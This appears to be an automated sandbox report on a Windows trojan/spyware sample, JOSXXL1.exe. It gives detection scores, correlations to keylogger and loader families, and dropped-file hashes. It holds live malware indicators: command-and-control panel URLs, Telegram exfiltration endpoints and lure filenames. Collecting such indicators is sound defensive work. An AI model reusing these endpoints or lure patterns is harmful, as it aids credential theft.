                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:JOSXXL1.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@3/7@6/5
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 97%
                                                              • Number of executed functions: 187
                                                              • Number of non-executed functions: 130
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: JOSXXL1.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              17:57:19API Interceptor8330x Sleep call for process: JOSXXL1.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              149.154.167.220SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzGet hashmaliciousUnknownBrowse
                                                                          PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  188.114.96.3DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                  R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                  7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.globaltrend.xyz/b2h2/
                                                                                  transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                  • paste.ee/d/Gitmx
                                                                                  19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.zonguldakescortg.xyz/483l/
                                                                                  PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rtpngk.xyz/876i/
                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                  • www.fnsds.org/
                                                                                  rPedidodecompra__PO20441__ARIMComponentes.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                  • dddotx.shop/Mine/PWS/fre.php
                                                                                  Orden de Compra No. 78986756565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                  • paste.ee/d/nwtkd
                                                                                  Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.launchdreamidea.xyz/bd77/

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  reallyfreegeoip.orgdekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Bank transfer receipt 241015.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  checkip.dyndns.comdekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  Bank transfer receipt 241015.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  api.telegram.orgSecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  TELEGRAMRUSecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 149.154.167.220
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  SOLICITUD URGENTE RFQ-05567.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  https://ipfox.co.uk/pages/thanks.html#RXJpay5Kb2huc29uQGFnLnN0YXRlLm1uLnVzGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbsGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Factura n#U00baB-2542.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 149.154.167.220
                                                                                  CLOUDFLARENETUSWINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 104.26.13.205
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 104.21.95.91
                                                                                  SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 104.21.9.210
                                                                                  R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 104.21.9.210
                                                                                  DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 104.21.9.210
                                                                                  MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 172.67.161.82
                                                                                  73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 172.67.161.82
                                                                                  SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 188.114.97.3
                                                                                  DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 188.114.96.3
                                                                                  R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 188.114.96.3
                                                                                  ORACLE-BMC-31898USdekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  (No subject) (92).emlGet hashmaliciousUnknownBrowse
                                                                                  • 192.29.14.118
                                                                                  Factura 1-014685.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 134.70.38.61
                                                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 129.147.169.37
                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                  • 147.154.3.56
                                                                                  la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 130.61.69.123
                                                                                  New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                                                                                  • 158.101.44.242
                                                                                  Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  54328bd36c14bd82ddaa0c04b25ed9ad8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  8m9f0jVE2G.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  https://docs.google.com/drawings/d/1igp9x84Q_2r8qSa1YDSk9dpVvjHGWjRjQMSbSGGfj2M/preview?pli=1VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1Bv689W8l3mkPZmP2UR2g0HlFBjRUIoZvJzUgEXisf43J0VKXX1BvGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  https://docs.google.com/drawings/d/1agK-6fGF4y65hrPDNlHipoTNyumPU-yxdwKLkQWhsQI/preview?pli=1oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  cabbage.exeGet hashmaliciousAtlantida StealerBrowse
                                                                                  • 188.114.96.3
                                                                                  Bank transfer receipt 241015.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Certificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  Justificante.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  n#U00ba 7064-2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eWINNING DILIGENCE - VESSEL PARTICULARS.doc.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 149.154.167.220
                                                                                  MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  MHQMJCOxjl.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  73OPQbICEW.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                  • 149.154.167.220
                                                                                  6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  gI1wz7QtZV.lnkGet hashmaliciousLonePageBrowse
                                                                                  • 149.154.167.220
                                                                                  Hxn7F5YIYJ.lnkGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                                                  • 149.154.167.220
                                                                                  37f463bf4616ecd445d4a1937da06e19GK059kPZ5B.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  TP77MvSzt2.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  jicQJ2cdlM.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  1GeaC4QnFy.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  OyPpyRRqd8.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225
                                                                                  H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                                                  • 142.250.185.238
                                                                                  • 142.250.181.225

                                                                                  Dropped Files

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dllCertificado FNMT-RCM.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                                                                                        SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exeGet hashmaliciousGuLoaderBrowse
                                                                                          UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            UMOWA_09.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                Payment Advice Note_Pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  Confirmation transfer AGS # 22-0024.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    Confirmation transfer AGS # 22-0024.exeGet hashmaliciousGuLoaderBrowse

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11776
                                                                                                      Entropy (8bit):5.655335921632966
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9
                                                                                                      MD5:EE260C45E97B62A5E42F17460D406068
                                                                                                      SHA1:DF35F6300A03C4D3D3BD69752574426296B78695
                                                                                                      SHA-256:E94A1F7BCD7E0D532B660D0AF468EB3321536C3EFDCA265E61F9EC174B1AEF27
                                                                                                      SHA-512:A98F350D17C9057F33E5847462A87D59CBF2AAEDA7F6299B0D49BB455E484CE4660C12D2EB8C4A0D21DF523E729222BBD6C820BF25B081BC7478152515B414B3
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: Certificado FNMT-RCM.exe, Detection: malicious, Browse
                                                                                                      • Filename: Produccion.exe, Detection: malicious, Browse
                                                                                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse
                                                                                                      • Filename: SecuriteInfo.com.Trojan.GenericKD.74281746.21507.1551.exe, Detection: malicious, Browse
                                                                                                      • Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse
                                                                                                      • Filename: UMOWA_09.BAT.exe, Detection: malicious, Browse
                                                                                                      • Filename: Payment Advice Note_Pdf.exe, Detection: malicious, Browse
                                                                                                      • Filename: Payment Advice Note_Pdf.exe, Detection: malicious, Browse
                                                                                                      • Filename: Confirmation transfer AGS # 22-0024.exe, Detection: malicious, Browse
                                                                                                      • Filename: Confirmation transfer AGS # 22-0024.exe, Detection: malicious, Browse
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...]..V...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\nsxA532.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1409020
                                                                                                      Entropy (8bit):3.71736605454036
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:21P7FUCCnQvh+93/wP1zPHb5hl88oLWGk4+7PYfno+DaiIcC4:gCQZ+93/Q1zP7flyLnkEfno+DNIU
                                                                                                      MD5:5FACE8BE4B0588E347D791DB87BCE6E8
                                                                                                      SHA1:2AC3BEF878AF7119B401C1CA8EC83BF6A4EF9402
                                                                                                      SHA-256:8D06F457E594F4B32611FBB2E5550E7442504E2AA407B627AF49F203EBA5E843
                                                                                                      SHA-512:D6A59362477E13D5AF298320DCBC0F8D0ECAEC9C391855ABED4ECC69D168DD38D8F1FA5F44AE67B55EBF1771D321551CB238CB0421A4C93DDE90CD32E8328C0E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:t8......,................................7......\8..........................................................................................................................................................................................................................................G...W...........z...j...............................................................................................................................`...........U...5...J...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\indvandrings\attraavrdig\Afsvor193\stiltish.sti

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):374900
                                                                                                      Entropy (8bit):2.280960262762324
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:bNFzfqxOSxM9xAWyQhTStOwqqWnf+3EQ+782Z5:BV6LmDpyQ9wIn8bYL3
                                                                                                      MD5:FD876F66CB55E8597AB2ADCB1715E24D
